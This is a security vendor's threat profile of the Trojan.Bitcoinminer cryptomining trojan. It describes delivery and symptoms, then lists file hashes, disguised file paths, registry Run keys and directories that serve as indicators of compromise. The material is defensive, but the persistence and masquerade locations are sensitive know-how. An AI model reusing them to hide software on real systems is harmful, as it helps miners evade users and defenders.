Trojan.Bitcoinminer

By GoldSparrow in Trojans

Threat Scorecard

Popularity Rank:	93
Threat Level:	80 % (High)
Infected Computers:	1,596,489

First Seen:	May 18, 2012
Last Seen:	April 3, 2026
OS(es) Affected:	Windows

Trojan.Bitcoinminer is one of the detection names that have been associated with an executable file named 'indexer.exe' that is used to mine BitCoins and FeatherCoins. Trojan.Bitcoinminer will be installed in a hidden directory in the AppData directory on the infected computer. Trojan.Bitcoinminer will mine Bitcoins using the infected computer's resources. Cryptocurrency mining can be extremely demanding on a computer's resources, making it overheat, perform poorly and consume more power. While BitCoin mining is a legitimate activity, Trojan.Bitcoinminer is used by on artists to take advantage of a victim's computer to mine BitCoins or another cryptocurrency, then keeping the profits generated at the expense of the victim's computer. While mining BitCoins with a single computer is rarely profitable, the people that distribute Trojan.Bitcoinminer and similar Trojans will take advantage of the combined resources of numerous infected computers by mining BitCoins and keeping the proceeds. Many Trojan.Bitcoinminer infections have been spotted in Russia, Ukraine and Indonesia currently.

How Trojan.Bitcoinminer may be Delivered

The most common way in which Trojan.Bitcoinminer may enter a computer is through fake software downloads and updates. Con artists may hide threats like Trojan.Bitcoinminer inside software and media files distributed online. Victims will download them from shady websites and the install Trojan.Bitcoinminer on their computers without being aware of it. The fact is that Trojan.Bitcoinminer will not alert the victims that their computers are infected such as a notification or interfere in any way. However, Trojan.Bitcoinminer will use up more than three-quarters of the infected computer's processing power for mining cryptocurrency. Victims of the Trojan.Bitcoinminer attack will, therefore, realize that their computers run extremely slowly and become unresponsive or unstable frequently. Additionally, it is not uncommon for threats like Trojan.Bitcoinminer to conflict with the victim's computer, causing various performance issues and preventing other software from functioning properly.

The Trojan.Bitcoinminer Infection and Its Related Symptoms

There are several symptoms that may indicate that your computer has been infected with Trojan.Bitcoinminer. Computer users have reported that most software, including email clients, will become unresponsive, freeze or crash frequently. Some software, especially Internet browsers, will fail to open completely and many files will fail to load. When victims attempt to use the infected computer to view a video or listen to music, this will have stuttering or altered playback, stopping and not resulting in a functional experience frequently. One typical problem associated with Trojan.Bitcoinminer will happen when typing. Computer users may notice that their keyboard inputs have a delay, especially on word processing programs. This indicates that a large portion of the infected computer's resources is being used. These symptoms may occur if victims are attempting to use a program that requires lots of resources (for example, for rendering a high-quality video). In this case, however, it's Trojan.Bitcoinminer that is using up the system's resources to mine cryptocurrency.

General Recommendations Related to Trojan.Bitcoinminer

Victims of Trojan.Bitcoinminer may notice 'indexer.exe' listed in the Task Manager. This is almost always an indicator of a Trojan.Bitcoinminer infection and requires action from the computer user. However, 'indexer.exe' is not the only name used by this BitCoin miner. PC security researchers advise computer users to remain vigilant, since other variants of Trojan.Bitcoinminer with different file names may appear. Malware investigators recommend that computer users use a security program to remove Trojan.Bitcoinminer and other threats. If your computer continues to show symptoms, it is important to use a different anti-virus program to ensure that the Trojan.Bitcoinminer infection or any related threat has been found (in some cases, other components may prevent its removal). The following are other names by which Trojan.Bitcoinminer may be detected:

PUP.Optional.Bitminer
RDN/Generic.dx!cxt
Riskware.Win32.BtcMine.cnywcu
Tool.BtcMine.157
Trojan ( 0048fd0e1 )
Trojan.Win32.Generic!BT
Trojan.Win32.S.BitMiner.932352
W32/Trojan.PBJZ-2853
Win32/BitCoinMiner.AS
Win32/Trojan.Multi.daf

SpyHunter Detects & Remove Trojan.Bitcoinminer

File System Details

Trojan.Bitcoinminer may create the following file(s):

Expand All | Collapse All

#	File Name	MD5	Detections Detections: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
1.	winrmsrv.exe	462ee20e8abbbb559bd1c4f8be87b123	28,332
Name: winrmsrv.exe MD5: 462ee20e8abbbb559bd1c4f8be87b123 Size: 731.13 KB (731136 bytes) Detections: 28,332 Type: Executable File Path: %WINDIR%\system32\winrmsrv.exe Group: Malware file Last Updated: March 31, 2026
2.	optimization.exe	cb77f063286ca531454f87c4acd6c990	1,014
Name: optimization.exe MD5: cb77f063286ca531454f87c4acd6c990 Size: 10.28 MB (10283008 bytes) Detections: 1,014 Type: Executable File Path: %SYSTEMDRIVE%\Users\<username>\appdata\roaming\microsoft\defragmentation Group: Malware file Last Updated: October 24, 2025
3.	ServiceHub.CLR.x64.exe	4a8982935d9fd546297141fc7d81bf63	708
Name: ServiceHub.CLR.x64.exe MD5: 4a8982935d9fd546297141fc7d81bf63 Size: 6.73 MB (6732800 bytes) Detections: 708 Type: Executable File Path: %ALLUSERSPROFILE%\Mega Tools\ServiceHub.CLR.x64.exe Group: Malware file Last Updated: April 3, 2026
4.	m.fjk	0479efe544f5242dea4a36beb4c7aac6	546
Name: m.fjk MD5: 0479efe544f5242dea4a36beb4c7aac6 Size: 11.81 MB (11814319 bytes) Detections: 546 Path: C:\Users\<username>\AppData\Roaming Group: Malware file Last Updated: December 1, 2025
5.	trz127E.tmp	baa1555b4d7878ca84962519947ad0c3	272
Name: trz127E.tmp MD5: baa1555b4d7878ca84962519947ad0c3 Size: 2.45 MB (2451968 bytes) Detections: 272 Type: Temporary File Path: C:\Users\<username>\AppData\Roaming\trz127E.tmp Group: Malware file Last Updated: October 24, 2025
6.	services64.exe	63703ea195bf16c8ad4f37177171de12	215
Name: services64.exe MD5: 63703ea195bf16c8ad4f37177171de12 Size: 5.59 MB (5593088 bytes) Detections: 215 Type: Executable File Path: C:\Users\<username>\AppData\Local\Temp\services64.exe Group: Malware file Last Updated: January 6, 2022
7.	desktop_media_service.exe	92f630bfb87c32b205316958034b8f29	180
Name: desktop_media_service.exe MD5: 92f630bfb87c32b205316958034b8f29 Size: 3.26 MB (3260416 bytes) Detections: 180 Type: Executable File Path: %ALLUSERSPROFILE%\2114947171962198487\desktop_media_service.exe Group: Malware file Last Updated: June 26, 2020
8.	1.exe	551e8c3cd0958e64c5cdf0176c606129	148
Name: 1.exe MD5: 551e8c3cd0958e64c5cdf0176c606129 Size: 4.81 MB (4814476 bytes) Detections: 148 Type: Executable File Path: %WINDIR%\web\1.exe Group: Malware file Last Updated: July 29, 2021
9.	Roaming/GameService2/service.exe	025ef509839a563c88b5409c7e17226e	148
Name: Roaming/GameService2/service.exe MD5: 025ef509839a563c88b5409c7e17226e Size: 5.63 MB (5635072 bytes) Detections: 148 Type: Executable File Path: C:\Users\<username>\AppData\Roaming/GameService2/service.exe Group: Malware file Last Updated: February 24, 2022
10.	TiWorker.exe	5b9608dce1723c3f321863e4fe1d070b	89
Name: TiWorker.exe MD5: 5b9608dce1723c3f321863e4fe1d070b Size: 4.44 MB (4449744 bytes) Detections: 89 Type: Executable File Path: C:\WINDOWS\SysWOW64\TiWorker.exe Group: Malware file Last Updated: March 4, 2022
11.	3f70a0a3669cf11f8e4bff5d61c758bdce53baf22d9244dc0db0fe66262d7a34	b5e6b2c92cced7cbe825b5ddfd577291	77
Name: 3f70a0a3669cf11f8e4bff5d61c758bdce53baf22d9244dc0db0fe66262d7a34 MD5: b5e6b2c92cced7cbe825b5ddfd577291 Size: 18.94 KB (18944 bytes) Detections: 77 Path: %SYSTEMDRIVE%\Users\<username>\Desktop\4622292107165696\3f70a0a3669cf11f8e4bff5d61c758bdce53baf22d9244dc0db0fe66262d7a34 Group: Malware file Last Updated: February 11, 2026
12.	bridlebuddlesservice.exe	caddcd79b283edfa5169e3cb1eb86d06	60
Name: bridlebuddlesservice.exe MD5: caddcd79b283edfa5169e3cb1eb86d06 Size: 10.1 MB (10103296 bytes) Detections: 60 Type: Executable File Path: %PROGRAMFILES(x86)%\bridlebuddles Group: Malware file Last Updated: December 8, 2019
13.	vcservice.exe	468f91ff2774a8484faa49ae63bbbbec	46
Name: vcservice.exe MD5: 468f91ff2774a8484faa49ae63bbbbec Size: 439.8 KB (439808 bytes) Detections: 46 Type: Executable File Path: C:\Users\<username>\AppData\Roaming\GameService2\vcservice.exe Group: Malware file Last Updated: February 24, 2022
14.	overidlebuddiesservice.exe	c7ae8932538274154653bcfbaf2210d0	36
Name: overidlebuddiesservice.exe MD5: c7ae8932538274154653bcfbaf2210d0 Size: 10.75 MB (10753024 bytes) Detections: 36 Type: Executable File Path: c:\program files (x86)\overidlebuddies Group: Malware file Last Updated: August 16, 2019
15.	29cf036480b6.dll	77ba4a18ef8719c2f218e87dfdcba58f	31
Name: 29cf036480b6.dll MD5: 77ba4a18ef8719c2f218e87dfdcba58f Size: 109.56 KB (109568 bytes) Detections: 31 Type: Dynamic link library Path: %WINDIR%\System32\29cf036480b6.dll Group: Malware file Last Updated: December 12, 2025
16.	sppsvc.exe	8491a3f6c096bd19310d1e899fad94f5	19
Name: sppsvc.exe MD5: 8491a3f6c096bd19310d1e899fad94f5 Size: 1.43 MB (1438208 bytes) Detections: 19 Type: Executable File Path: C:\WINDOWS\Fonts\sppsvc.exe Group: Malware file Last Updated: October 24, 2025
17.	helper.exe	c414dfba78d5fce6a9b7df644ce75003	18
Name: helper.exe MD5: c414dfba78d5fce6a9b7df644ce75003 Size: 7.58 MB (7586304 bytes) Detections: 18 Type: Executable File Path: %SYSTEMDRIVE%\Users\<username>\appdata\roaming\microsoft\windows Group: Malware file Last Updated: September 15, 2021
18.	zcoin-qt.exe	20f333c444ebe1d7ecdb744296b4d2ea	18
Name: zcoin-qt.exe MD5: 20f333c444ebe1d7ecdb744296b4d2ea Size: 42.52 MB (42525712 bytes) Detections: 18 Type: Executable File Path: d:\zcoin Group: Malware file Last Updated: January 18, 2020
19.	guiminer-20110501.exe	5c40990dbae70347e37ccdd4ca10081f	14
Name: guiminer-20110501.exe MD5: 5c40990dbae70347e37ccdd4ca10081f Size: 7.27 MB (7276915 bytes) Detections: 14 Type: Executable File Path: %SYSTEMDRIVE%\Documents and Settings\Owner\Desktop\ONE PLACE\BItcoin Miner Guide\bitcoin miner+guide\install+setup\guiminer-20110501.exe Group: Malware file Last Updated: November 25, 2022
20.	Kingmaker Rise to the Throne - Collector's. Edition.exe	4dcc9bf45072c5bbb88dc5f4d55dc7f7	14
Name: Kingmaker Rise to the Throne - Collector's. Edition.exe MD5: 4dcc9bf45072c5bbb88dc5f4d55dc7f7 Size: 987.66 KB (987663 bytes) Detections: 14 Type: Executable File Path: C:\Users\<username>\AppData\Roaming\Kingmaker Rise to the Throne - Collector's. Edition.exe Group: Malware file Last Updated: October 24, 2025
21.	Services.exe	d9059794e2cfe43a6db03faee5860bc6	13
Name: Services.exe MD5: d9059794e2cfe43a6db03faee5860bc6 Size: 3.51 MB (3512360 bytes) Detections: 13 Type: Executable File Path: C:\Users\<username>\AppData\Local\Temp\RarSFX8 Group: Malware file Last Updated: June 22, 2020
22.	sysconfig.exe	4152bf9e1aaa428fbbcf91d133f25794	12
Name: sysconfig.exe MD5: 4152bf9e1aaa428fbbcf91d133f25794 Size: 8.7 KB (8704 bytes) Detections: 12 Type: Executable File Path: C:\kernel Group: Malware file Last Updated: September 11, 2019
23.	osdmnus.exe	4caf60213aebb70e4ea983a3141ef5bc	10
Name: osdmnus.exe MD5: 4caf60213aebb70e4ea983a3141ef5bc Size: 7.16 KB (7168 bytes) Detections: 10 Type: Executable File Path: %SYSTEMDRIVE%\Users\<username>\AppData\Roaming\osdmnuu_dir\osdmnus.exe Group: Malware file Last Updated: June 27, 2020
24.	XMR Silent Miner by Tigerzplace.exe	4c624ced3b2e239cf9c6b6488c37d97e	8
Name: XMR Silent Miner by Tigerzplace.exe MD5: 4c624ced3b2e239cf9c6b6488c37d97e Size: 14.21 MB (14211608 bytes) Detections: 8 Type: Executable File Path: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup Group: Malware file Last Updated: April 12, 2020
25.	Desktop-64.exe	2c9550a1516bcc5590379fb0e968118b	6
Name: Desktop-64.exe MD5: 2c9550a1516bcc5590379fb0e968118b Size: 4.57 MB (4578304 bytes) Detections: 6 Type: Executable File Path: C:\Wlndows\system32 Group: Malware file Last Updated: February 11, 2020
26.	ja.exe	a06f3792c7e517bca2f7b7e519630f07	6
Name: ja.exe MD5: a06f3792c7e517bca2f7b7e519630f07 Size: 271.97 MB (271972975 bytes) Detections: 6 Type: Executable File Path: C:\ist Group: Malware file Last Updated: February 8, 2020
27.	skinsunlocked.exe	f1a545f5d7a0443cc0bded7704c1022e	4
Name: skinsunlocked.exe MD5: f1a545f5d7a0443cc0bded7704c1022e Size: 7.05 MB (7050752 bytes) Detections: 4 Type: Executable File Path: C:\ProgramData\kydudqtYtV\skinsunlocked.exe Group: Malware file Last Updated: April 8, 2022
28.	Update.exe	f1dcd42899ff80dd03925b3e5c4ea81e	3
Name: Update.exe MD5: f1dcd42899ff80dd03925b3e5c4ea81e Size: 901.2 KB (901204 bytes) Detections: 3 Type: Executable File Path: C:\ProgramData\Wargaming.net\GameCenter\Update.exe Group: Malware file Last Updated: September 10, 2023
29.	service.exe	f7a86d16bc207b5c867bdd4e39b726f7	2
Name: service.exe MD5: f7a86d16bc207b5c867bdd4e39b726f7 Size: 5.67 MB (5676544 bytes) Detections: 2 Type: Executable File Path: c:\Users\<username>\appdata\roaming\gameservice2 Group: Malware file Last Updated: October 15, 2021
30.	bitfc2e.tmp	69a51616979d7896d8378fe517e571f8	1
Name: bitfc2e.tmp MD5: 69a51616979d7896d8378fe517e571f8 Size: 10.74 MB (10749696 bytes) Detections: 1 Type: Temporary File Path: c:\Users\<username>\appdata\local\temp Group: Malware file Last Updated: May 11, 2019

More files

Registry Details

Trojan.Bitcoinminer may create the following registry entry or registry entries:

File name without path

32xmrig.exe

64xmrig.exe

cpuminer-gw64.exe

cpuminer-sse2.exe

DOC001.exe

IdlingBuddy.lnk

IMG001.exe

img002.exe

nbminer.exe

nheqminer.exe

nheqminer32.exe

NsCpuCNMiner32.exe

NsCpuCNMiner64.exe

NsGpuCNMiner.exe

xmrig-amd.exe

xmrig-notls.exe

xmrig-nvidia.exe

Regexp file mask

%ALLUSERSPROFILE%\Application Data\NVIDIA_cure.exe

%ALLUSERSPROFILE%\DriversI\intel.exe

%ALLUSERSPROFILE%\esif.exe

%ALLUSERSPROFILE%\flash\msacuil.exe

%ALLUSERSPROFILE%\Framework\System.exe

%ALLUSERSPROFILE%\GS_Svc.exe

%ALLUSERSPROFILE%\Intel(R) Management\intel[RANDOM CHARACTERS].exe

%ALLUSERSPROFILE%\Intel(R) Management\run.exe

%ALLUSERSPROFILE%\Komar.exe

%ALLUSERSPROFILE%\Mbvhost.exe

%ALLUSERSPROFILE%\Microsoft\Defender\jusched_srv.exe

%ALLUSERSPROFILE%\Microsoft\Security Windows\svshost.exe

%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe

%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup\winhost.exe

%ALLUSERSPROFILE%\MicrosoftCare.exe

%ALLUSERSPROFILE%\NVIDIA_cure.exe

%ALLUSERSPROFILE%\olly.exe

%ALLUSERSPROFILE%\onedrive.exe

%ALLUSERSPROFILE%\Roamer.exe

%ALLUSERSPROFILE%\run[NUMBERS].exe

%ALLUSERSPROFILE%\Skype\chrome.exe

%ALLUSERSPROFILE%\Skype\msacuil.exe

%ALLUSERSPROFILE%\SQLEXPRESS_X64_86.exe

%ALLUSERSPROFILE%\System32\Logs\ShellExperienceHost.exe

%ALLUSERSPROFILE%\VsTelemetry\vshub.exe

%ALLUSERSPROFILE%\windowsservices\helper.vbs

%ALLUSERSPROFILE%\zun.exe

%APPDATA%\1.cmd

%APPDATA%\2.cmd

%APPDATA%\32.exe

%APPDATA%\Adobe\Flash Player\MediaCache\IEMonitor.exe

%APPDATA%\Adobe\Share\AMDshare.exe

%APPDATA%\Adobe\Share\Launcher.exe

%APPDATA%\Adobe\Share\NVIDIAshare.exe

%APPDATA%\Adobe\Share\Share[NUMBERS].exe

%APPDATA%\Adobe\syssl.exe

%APPDATA%\Adobe\Updater6\AdobeService.exe

%APPDATA%\Alxi\Alxi.vbs

%appdata%\appcontainer\storage\microsoft.microsoftedge_8wekyb3d8bbwe\children\001\internet settings\guard.exe

%appdata%\appcontainer\storage\microsoft.microsoftedge_8wekyb3d8bbwe\children\001\internet settings\sysclc.exe

%APPDATA%\appmgr\appmgr.exe

%APPDATA%\Architecture\member\Systemcore.exe

%APPDATA%\coinutil.dll

%APPDATA%\crmsvc.exe

%APPDATA%\DirectX\DirectX.vbs

%APPDATA%\documents\imonitor.exe

%APPDATA%\driver\driver.exe

%APPDATA%\etctool\etc.vbs

%APPDATA%\Filosof\Filosof.vbs

%APPDATA%\FireFox\launcher\Systemcore.exe

%appdata%\google\chrome\user data\spool.exe

%APPDATA%\GoogleUpdater.exe

%APPDATA%\Idle\Idle.exe

%APPDATA%\Images\image.exe

%APPDATA%\Images\images.exe

%APPDATA%\isaa.exe

%APPDATA%\Java\x86-64bits Windows\Config-DefaultMain\SysUtils SDK v2.49\svhcost.exe

%APPDATA%\Launcher_01.exe

%APPDATA%\Launcher_08.exe

%APPDATA%\libraries\MicrosoftRuntimeUpdate.vbe

%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SyncCheck.exe

%APPDATA%\Mama\mama.vbs

%APPDATA%\mcrserver.exe

%APPDATA%\MicroMon\curl.exe

%APPDATA%\Microsoft\msconfig.exe

%APPDATA%\Microsoft\office\dllchost.exe

%APPDATA%\Microsoft\Windows Protect\winprotect.exe

%APPDATA%\Microsoft\Windows\CPU\taskhost.exe

%APPDATA%\Microsoft\Windows\Helper.exe

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\AudioDriver.url

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Browge.vbs

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Check for updates.bat

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\fBCjxCDztG.url

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\GoogleCrashHandlerws.vbs

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\IeServise.lnk

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\key.exe

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\miner.exe.url

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneMisc.vbs

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\rara.vbs

%APPDATA%\Microsoft\Windows\winhost.exe

%APPDATA%\MicrosoftViewer.exe

%APPDATA%\miner-x64.exe

%APPDATA%\miner.dll

%APPDATA%\rarog.exe

%APPDATA%\Roamer.exe

%APPDATA%\RunSpeed\RunSpeed.vbs

%APPDATA%\Sasha\Sasha.vbs

%APPDATA%\SearchProtocolHosts.exe

%APPDATA%\server\minergate.exe

%APPDATA%\server\runhosts.exe

%APPDATA%\svc\svc.exe

%APPDATA%\System\etp.exe

%APPDATA%\systemcare-ppi-ul5.dll

%APPDATA%\systemcare.exe

%APPDATA%\SystemProcess\SystemProcess.exe

%APPDATA%\taskmg.exe

%APPDATA%\TeleMetric\TeleMetric.exe

%APPDATA%\Temp\DOC001.exe

%APPDATA%\Updater\localversion.txt

%APPDATA%\Updater\Update.cmd

%APPDATA%\Valit\jukov.vbs

%APPDATA%\Valit\lera.vbs

%APPDATA%\Valit\Valit.vbs

%APPDATA%\vfc\ffmpeg\task.exe

%APPDATA%\windows-ppi-ul5.dll

%APPDATA%\WindowsApps\CPU1\intel1.exe

%APPDATA%\WindowsApps\CPU\intel.exe

%APPDATA%\WindowsApps\taskwint.exe

%APPDATA%\WindowsApps\winitex.exe

%APPDATA%\winhost.exe

%APPDATA%\winlog.exe

%APPDATA%\winlog.vbs

%APPDATA%\WinRAR\Precomp\precomp.exe

%APPDATA%\xmrig[NUMBERS].exe

%APPDATA%\Zara\zara.vbs

%COMMONPROGRAMFILES%\System\svchost.exe

%COMMONPROGRAMFILES(x86)%\new.bat

%HOMEDRIVE%\Applications\cmdsrvs.exe

%HOMEDRIVE%\Applications\Service.exe

%HOMEDRIVE%\Applications\websock.exe

%HOMEDRIVE%\ASD\cpuminer-sse2.exe

%HOMEDRIVE%\ASD\nh.exe

%HOMEDRIVE%\backupsys\pow32.bat

%HOMEDRIVE%\backupsys\system.bat

%HOMEDRIVE%\backupsys\taskmgr32.exe

%HOMEDRIVE%\backupsys\window[NUMBERS].vbs

%HOMEDRIVE%\browse\browse.exe

%HOMEDRIVE%\Browse\cmdsrvs.exe

%HOMEDRIVE%\Disk\cmdsvr.exe

%HOMEDRIVE%\Disk\securedisk.exe

%HOMEDRIVE%\Disk\WebService.exe

%HOMEDRIVE%\DOC001.exe

%HOMEDRIVE%\images.scr

%HOMEDRIVE%\intel\setup.vbs

%HOMEDRIVE%\MSOCache\svchost.exe

%HOMEDRIVE%\WindowsData\hostdl.exe

%LOCALAPPDATA%\amd\amd_accelerator.exe

%LOCALAPPDATA%\Explorer Data\msiexec64.exe

%LOCALAPPDATA%\Intel\iaa23.exe

%LOCALAPPDATA%\Intel\iap23.dll

%localappdata%\intel\iii.pl

%localappdata%\intel\iii.zip

%LOCALAPPDATA%\Intel\imgre.exe

%LOCALAPPDATA%\Intel\intelmngr.exe

%LOCALAPPDATA%\Intel\management.db

%localappdata%\intel\red.dll

%LOCALAPPDATA%\isaa.exe

%LOCALAPPDATA%\Optimizer\Optimizer.exe

%LOCALAPPDATA%\Roamer.exe

%LOCALAPPDATA%\smartstats\smassvc.exe

%LOCALAPPDATA%\SQLite\SQLManager.exe

%LOCALAPPDATA%\SQLite\wincpu.exe

%PROGRAMFILES%\SQLite\SQLManager.exe

%PROGRAMFILES(x86)%\SQLite\SQLManager.exe

%PROGRAMFILES(x86)%\SQLite\wincpu.exe

%PUBLIC%\documents\documentsindex.dll

%PUBLIC%\Libraries\wsappx.exe

%TEMP%\DrToolKrl.sys

%TEMP%\hiddengate.exe

%TEMP%\isaa.exe

%TEMP%\Kilence.exe

%TEMP%\Roamer.exe

%TEMP%\wup\wup.exe

%TEMP%\xmrig.exe

%TEMP%\ytmp\t[NUMBERS].[RANDOM CHARACTERS]

%USERPROFILE%\Documents\xmrig.exe

%USERPROFILE%\NVDisplay.exe

%WINDIR%\deftesrg.exe

%WINDIR%\fonts\conhost.exe

%WINDIR%\Fonts\MsEssentialSecurity.exe

%WINDIR%\Fonts\svchost.exe

%WINDIR%\HS_Svc.exe

%WINDIR%\IIS\crss.exe

%WINDIR%\ime\rescv.exe

%WINDIR%\inf\msief.exe

%WINDIR%\installer\patchcach\systemnt.exe

%WINDIR%\jb-JP\spools.exe

%WINDIR%\LiveKernel\SRPolicySvc.exe

%WINDIR%\mcfg\mcfg.exe

%WINDIR%\microsoft.net\framework64\v4.0.30319\gpsrv.exe

%WINDIR%\mscsuscr.exe

%WINDIR%\nv\NvProfileUpdater64.exe

%WINDIR%\nvidia\NvUpdater64.exe

%WINDIR%\scsktsvc.exe

%WINDIR%\servime.exe

%WINDIR%\Sys64\starter.exe

%WINDIR%\Sys\taskmgr.exe

%WINDIR%\System32\config\systemprofile\AppData\Roaming\Microsoft\cred.ps1

%WINDIR%\system32\dllhostex.exe

%WINDIR%\System32\drivers\etc\svchost.exe

%WINDIR%\system32\MaintenancesServices.dll

%WINDIR%\System32\mcicda32.dll

%WINDIR%\system32\mcicda64.dll

%WINDIR%\system32\SecUpdateHost.exe

%WINDIR%\system32\Tasks\CPUSpeed

%WINDIR%\system32\Tasks\GPUSpeed

%WINDIR%\System32\Tasks\RestoreRevTask

%WINDIR%\System32\Tasks\UpdaterChromeApp[RANDOM CHARACTERS]

%WINDIR%\system32\TasksHostServices.exe

%WINDIR%\system32\vmichapagentsrv.dll

%WINDIR%\system32\werlfault.exe

%WINDIR%\System32\windfn.exe

%WINDIR%\system32\wmassrv.dll

%WINDIR%\system32\WUDHostServices.exe

%WINDIR%\SysWOW64\HS\Client.exe

%WINDIR%\SysWOW64\HS\HS_Svc.exe

%WINDIR%\TEMP\32x64.exe

%WINDIR%\TEMP\amdxx64.exe

%WINDIR%\TEMP\antspywares.exe

%WINDIR%\TEMP\av64n.exe

%WINDIR%\TEMP\nvi864.exe

%Windir%\temp\y1.bat

%WINDIR%\wdf\wdf.exe

%WINDIR%\window.exe

%WINDIR%\wmi\WmiPrvSE.exe

%WINDIR%\WmiPrvSE.exe

%WINDIR%\wmu2\wininit.exe

%WINDIR%\wolf\minerw{0,1}.exe

%WINDIR%\xmrig[NUMBERS].exe

HKEY..\..\..\..{RegistryKeys}

Software\Ashampoo\Ashampoo Gadge It\PQwick

SOFTWARE\IdleBuddy

SOFTWARE\idledbuddy

Software\idlenessbuddy

SOFTWARE\idlingbuddy

SOFTWARE\Jetmedia

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CPUSpeed

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GPUSpeed

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RestoreRevTask

Software\Microsoft\Windows\CurrentVersion\Run\AVAADA

Software\Microsoft\Windows\CurrentVersion\Run\PQwick

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\vnlgp

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zminer

SOFTWARE\Native System Provider

SOFTWARE\SystemaRev

Software\VideoDrivers

SOFTWARE\Wow6432Node\IdleBuddy

SOFTWARE\Wow6432Node\idledbuddy

SOFTWARE\Wow6432Node\idlenessbuddy

SOFTWARE\Wow6432Node\idlingbuddy

SOFTWARE\Wow6432Node\Jetmedia

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\vnlgp

SOFTWARE\Wow6432Node\Native System Provider

SYSTEM\ControlSet001\Services\AdobeFlashPlayerHash

SYSTEM\ControlSet001\Services\DirectX11b

SYSTEM\ControlSet001\Services\MinerGate

SYSTEM\ControlSet001\services\NativeDesktopMediaService

SYSTEM\ControlSet002\Services\AdobeFlashPlayerHash

SYSTEM\ControlSet002\Services\DirectX11b

SYSTEM\ControlSet002\Services\MinerGate

SYSTEM\ControlSet002\services\NativeDesktopMediaService

SYSTEM\CurrentControlSet\Services\AdobeFlashPlayerHash

SYSTEM\CurrentControlSet\Services\DirectX11b

SYSTEM\CurrentControlSet\Services\MinerGate

System\CurrentControlSet\Services\NativeDesktopMediaService

HKEY_LOCAL_MACHINE\Software\[APPLICATION]\Microsoft\Windows\CurrentVersion\Uninstall..{Uninstaller}

Altruistic

bridlebuddles

Id_Buddy

IdBuddy

idle--buddy

IdleBuddy

idledbuddy

idlenessbuddy

IdlingBuddy

overidlebuddies

PQwick

{0854AE3A-3A63-4BC6-BE20-F4185D343B5A}_is1

{4A91D8B3-712F-4815-B29B-E610008C4704}

{4CF9B388-78FA-46C3-B409-196FE2CF5F20}

{BEA0F17A-FD14-4646-8138-30994D87948A}_is1

{C2AA50F8-B1B8-4A40-BC18-E6CAB19DC0ED}_is1

{EC27A18E-53F3-4434-B08D-26C3E751C50F}

{FC44DE72-60F9-4BC1-B098-D2F6B5A06187}

Directories

Trojan.Bitcoinminer may create the following directory or directories:

%ALLUSERSPROFILE%\Application Data\clr_optimization_v4.0.30318_64

%ALLUSERSPROFILE%\Application Data\clr_optimization_v4.0.52760_64

%ALLUSERSPROFILE%\Application Data\wrdjdgyrmg

%ALLUSERSPROFILE%\AudioDriver

%ALLUSERSPROFILE%\DirectX11b

%ALLUSERSPROFILE%\Flashas

%ALLUSERSPROFILE%\Flashe

%ALLUSERSPROFILE%\FrameworkHostPro

%ALLUSERSPROFILE%\Guard Tool

%ALLUSERSPROFILE%\Guardm

%ALLUSERSPROFILE%\Haalety

%ALLUSERSPROFILE%\Intel(R)Usb3.0

%ALLUSERSPROFILE%\IntelD

%ALLUSERSPROFILE%\JetMedia

%ALLUSERSPROFILE%\Logiteh

%ALLUSERSPROFILE%\Micro Foundation 7

%ALLUSERSPROFILE%\MicrosoftCorporation

%ALLUSERSPROFILE%\ModuleGS

%ALLUSERSPROFILE%\PhysicalDeviceAdapter

%ALLUSERSPROFILE%\SRAPO64srrstr

%ALLUSERSPROFILE%\ServiceProfiles

%ALLUSERSPROFILE%\Systema Natives

%ALLUSERSPROFILE%\SystemaRev

%ALLUSERSPROFILE%\Systemfiles

%ALLUSERSPROFILE%\Task.Manager.Helper

%ALLUSERSPROFILE%\UHASecurity

%ALLUSERSPROFILE%\Windows64

%ALLUSERSPROFILE%\WindowsAppCertification

%ALLUSERSPROFILE%\clr_optimization_v4.0.30318_64

%ALLUSERSPROFILE%\eizzbvEmWK

%ALLUSERSPROFILE%\flashes

%ALLUSERSPROFILE%\flashi

%ALLUSERSPROFILE%\hkrfjnygtg

%ALLUSERSPROFILE%\lpmti

%ALLUSERSPROFILE%\mg32

%ALLUSERSPROFILE%\playersclub

%ALLUSERSPROFILE%\securityhealth

%ALLUSERSPROFILE%\sqlncli11imageres

%ALLUSERSPROFILE%\task

%ALLUSERSPROFILE%\wincss

%ALLUSERSPROFILE%\wintcpautoproxysvc

%ALLUSERSPROFILE%\wrdjdgyrmg

%ALLUSERSPROFILE%\zvmimcgqez

%ALLUSERSPROFILE%\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}

%ALLUSERSPROFILE%\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}

%APPDATA%\8mFuF

%APPDATA%\AMDProcess

%APPDATA%\Adobe32

%APPDATA%\Adobe32x64

%APPDATA%\Alix

%APPDATA%\Aplfone

%APPDATA%\AsCDPro

%APPDATA%\AudioHDriver

%APPDATA%\Auto1Feed

%APPDATA%\DPTopologyApp

%APPDATA%\Defender

%APPDATA%\Dibifu_9

%APPDATA%\Faqelo

%APPDATA%\Fujelo

%APPDATA%\Google\GoogleUpdates

%APPDATA%\IdleProcess

%APPDATA%\Ie1Servise

